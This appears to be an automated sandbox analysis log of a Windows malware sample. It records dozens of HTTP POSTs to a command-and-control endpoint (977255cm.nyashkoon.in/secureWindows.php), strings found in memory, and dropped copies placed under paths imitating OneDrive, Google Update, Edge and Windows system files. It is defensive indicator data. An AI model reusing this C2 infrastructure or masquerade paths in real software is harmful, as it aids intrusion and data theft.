Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1324Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: 977255cm.nyashkoon.in
Source: unknown HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://977255cm.nyashkX
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://977255cm.nyashkX:t
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://977255cm.nyashkoon.in
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://977255cm.nyashkoon.in/
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://977255cm.nyashkoon.in/secureWindows.php
Source: 0JLWNg4Sz1.exe, 00000000.00000002.1703180777.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Detected potential crypto function
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9B770D47 0_2_00007FFD9B770D47
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9B770E43 0_2_00007FFD9B770E43
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9B8D370F 0_2_00007FFD9B8D370F
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9B8D374C 0_2_00007FFD9B8D374C
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9BB1AC12 0_2_00007FFD9BB1AC12
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9BB19E66 0_2_00007FFD9BB19E66
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B780D47 6_2_00007FFD9B780D47
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B780E43 6_2_00007FFD9B780E43
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B7B1998 6_2_00007FFD9B7B1998
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B7BEEA8 6_2_00007FFD9B7BEEA8
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B8E370F 6_2_00007FFD9B8E370F
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B8E374C 6_2_00007FFD9B8E374C
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB25384 6_2_00007FFD9BB25384
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB2AA81 6_2_00007FFD9BB2AA81
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB20110 6_2_00007FFD9BB20110
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB2906D 6_2_00007FFD9BB2906D
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB2A71C 6_2_00007FFD9BB2A71C
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Code function: 7_2_00007FFD9B760D47 7_2_00007FFD9B760D47
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Code function: 7_2_00007FFD9B760E43 7_2_00007FFD9B760E43
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 25_2_00007FFD9B780D47 25_2_00007FFD9B780D47
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 25_2_00007FFD9B780E43 25_2_00007FFD9B780E43
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 26_2_00007FFD9B790D47 26_2_00007FFD9B790D47
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 26_2_00007FFD9B790E43 26_2_00007FFD9B790E43
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 27_2_00007FFD9B780D47 27_2_00007FFD9B780D47
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 27_2_00007FFD9B780E43 27_2_00007FFD9B780E43
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 27_2_00007FFD9B7B1998 27_2_00007FFD9B7B1998
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 28_2_00007FFD9B760D47 28_2_00007FFD9B760D47
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 28_2_00007FFD9B760E43 28_2_00007FFD9B760E43
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 28_2_00007FFD9B791998 28_2_00007FFD9B791998
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 29_2_00007FFD9B760D47 29_2_00007FFD9B760D47
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 29_2_00007FFD9B760E43 29_2_00007FFD9B760E43
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 29_2_00007FFD9B791998 29_2_00007FFD9B791998
